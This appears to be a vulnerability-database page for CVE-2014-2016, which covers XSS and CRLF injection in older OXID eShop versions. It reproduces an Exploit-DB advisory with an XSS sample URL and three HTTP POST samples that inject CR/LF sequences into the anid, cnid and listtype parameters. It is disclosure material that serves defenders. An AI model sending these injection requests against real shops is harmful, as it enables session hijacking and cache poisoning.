CVE-2014-2016
medium
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
5.3
Description
Multiple cross-site scripting (XSS) vulnerabilities in OXID eShop Professional and Community Edition 4.6.8 and earlier, 4.7.x before 4.7.11, and 4.8.x before 4.8.4, and Enterprise Edition 4.6.8 and earlier, 5.0.x before 5.0.11 and 5.1.x before 5.1.4 allow remote attackers to inject arbitrary web script or HTML via the searchtag parameter to the getTag function in (1) application/controllers/details.php or (2) application/controllers/tag.php.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities
# Exploit Title: OXID eShop v<4.7.11/5.0.11 + v<4.8.4/5.1.4 Multiple Vulnerabilities
# Google Dork: -
# Date: 12/2013
# Exploit Author: //sToRm
# Author mail: storm@sicherheit-online.org
# Vendor Homepage: http://www.oxid-esales.com
# Software Link: -
# Version: All versions < 4.7.11/5.0.11 + All versions < 4.8.4/5.1.4
# Tested on: Multiple platforms
# CVE : CVE-2014-2016 + CVE-2014-2017 (reserved)
###########################################################################################################
# XSS vulnerability #######################################################################################
Under certain circumstances, an attacker can trick a user to enter a specially crafted
URI or click on a mal-formed link to exploit a cross-site scripting vulnerability that
theoretically can be used to gain unauthorized access to a user account or collect
sensitive information of this user.
SAMPLE: -------------------------------------------------------------------------------
http://HOST/tag/sample/sample-name.html?cur=2&listtype=tag&pgNr=2&searchtag=[XSS]
---------------------------------------------------------------------------------------
Products:
OXID eShop Enterprise Edition
OXID eShop Professional Edition
OXID eShop Community Edition
Releases: All previous releases
Platforms: All releases are affected on all platforms.
STATE
- Resolved in OXID eShop version 4.7.11/5.0.11. and OXID eShop version 4.8.4/5.1.4.
- A fix for OXID eShop version 4.6.8 is available.
Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-001
###########################################################################################################
###########################################################################################################
###########################################################################################################
# Multiple CRLF injection / HTTP response splitting #######################################################
Under certain circumstances (depending on the browser, OS, PHP-Version), an attacker can trick a user to
enter a specially crafted URI or click on a mal-formed link to exploit a HTTP response splitting vulnerability
that theoretically can be used to poison cache, gain unauthorized access to a user account or collect
sensitive information of this user.
A possible exploit by passing such a mal-formed URI could lead to:
- return of a blank page or a PHP error (depending on one's server configuration)
- set unsolicited browser cookies
Products:
OXID eShop Enterprise Edition
OXID eShop Professional Edition
OXID eShop Community Edition
Releases: All previous releases
Platforms: All releases are affected on all platforms.
STATE:
- Resolved in OXID eShop version 4.7.11/5.0.11. and OXID eShop version 4.8.4/5.1.4.
- A fix for OXID eShop version 4.6.8 is available.
Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-002
Vulnerability details:
###########################################################################################################
# 1 # CRLF injection / HTTP response splitting ############################################################
PATH: ROOT/index.php
PARAMETER: anid
CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=start
&aid=1
&am=1
&anid=%0d%0a%20[INJECT:INJECT]
&cl=start
&fnc=tobasket
&lang=0
&pgNr=0
&stoken=1
-----------------------------------------------------------------------------------------------------------
SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=start&aid=1&am=1&anid=%0d%0a%20INJECTED:INJECTED_DATA&cl=start&fnc=tobasket&lang=0&pgNr=0&stoken=1
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################
###########################################################################################################
# 2 # CRLF injection / HTTP response splitting ############################################################
PATH: ROOT/index.php
PARAMETER: cnid
CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=details
&aid=1
&am=1
&anid=0
&cl=details
&cnid=%0d%0a%20[INJECTED:INJECTED]
&fnc=tobasket
&lang=0
&listtype=list
&panid=
&parentid=1
&stoken=1
&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=%0d%0a%20INJECTED:INJECTED_DATA&fnc=tobasket&lang=0&listtype=list&panid=&parentid=1&stoken=1&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################
###########################################################################################################
# 3 # CRLF injection / HTTP response splitting ############################################################
PATH: ROOT/index.php
PARAMETER: listtype
CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=details
&aid=1
&am=1
&anid=0
&cl=details
&cnid=0
&fnc=tobasket
&lang=0
&listtype=%0d%0a%20[INJECTED:INJECTED]
&panid=
&parentid=0
&stoken=0
&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=0&fnc=tobasket&lang=0&listtype=%0d%0a%20INJECTED:INJECTED_DATA&panid=&parentid=0&stoken=0&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################
Many greetings to all lunatics and freaks out there who live daily in the code like me and my partners.
A thanks to the developers who have responded relatively quickly.
Cheers!
//sToRmApplication impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| oxid-esales | eshop | {"endIncluding":"4.6.8"} | |
References
CWEs
CWE-79
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.